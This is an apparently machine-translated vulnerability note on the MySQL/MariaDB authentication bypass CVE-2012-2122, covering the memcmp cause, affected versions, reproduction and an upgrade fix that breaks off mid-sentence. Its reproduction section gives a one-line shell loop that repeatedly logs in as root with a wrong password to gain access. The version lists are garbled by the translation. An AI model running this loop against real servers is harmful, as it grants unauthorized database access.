MySQL authentication bypass vulnerability (cve-2012-2122)

Vulnerability profile

When the connection MariaDB/MySQL when , The password entered will be compared with the expected correct password , Due to improper handling , Can lead to even memcmp () Returns a nonzero value , Also can make MySQL Think two passwords are the same . That is to say, as long as you know the user name , Try again and again to log in directly SQL database .

Affected version

• MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL
• versions from 5.1.63, 5.5.24, 5.6.6 are not.

Reasons for appearance

This vulnerability is due to memcmp Function only returns -128 To 127 Values in range , Optimized on some platforms , Cause even memcmp() Returns a nonzero value , Also can make MySQL Think two passwords are the same . about 256 You can succeed once .

Loophole recurrence

Scan open ports

use MSF attack

EXP

for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done

Repair

upgrade MySQL edition ,（ Those lower than the following versions must be upgraded to the latest version ：5.0 Version below 5.0.96;5.1 Version below 5.1.63;5.5 Version below 5.5.25） stop it mysql, Back up the entire mysql, The installation directory ,data Catalog （ This step is only to prevent escalation